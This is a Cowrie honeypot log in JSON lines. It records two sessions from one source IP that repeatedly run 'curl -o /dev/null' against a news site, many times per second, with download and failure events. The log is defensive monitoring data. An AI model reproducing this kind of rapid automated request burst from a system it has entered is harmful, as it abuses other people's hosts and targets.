{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.153020Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.161616Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.167308Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.173511Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.174654Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.189977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.191450Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.194801Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.196121Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.201824Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.216550Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.217658Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.234425Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.246977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.248176Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.265667Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.266763Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.272358Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.273834Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.279972Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.280588Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.296971Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.298272Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.306141Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.310257Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.311404Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.316970Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.340755Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.341541Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.353684Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.354995Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.375638Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.394981Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.396028Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.412066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.413012Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.416810Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.420890Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.423878Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.436925Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.455621Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.456695Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.469522Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.474315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.475595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.477396Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.480848Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.506719Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.509065Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.510190Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.520665Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.522031Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.526411Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.551534Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.555593Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.556704Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.568272Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.569492Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.616080Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.618108Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.621384Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.624882Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.625822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.645611Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.672023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.673203Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.678199Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.679123Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.718795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.720117Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.723299Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.724362Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.749815Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.762287Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.763394Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.766801Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.767817Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.770745Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.783887Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.805464Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.806772Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.809809Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.811846Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.815039Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.845113Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.846466Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.852033Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.853792Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.895180Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.896541Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.900744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.901879Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.937739Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.938556Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.942898Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.943874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.978807Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.979875Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
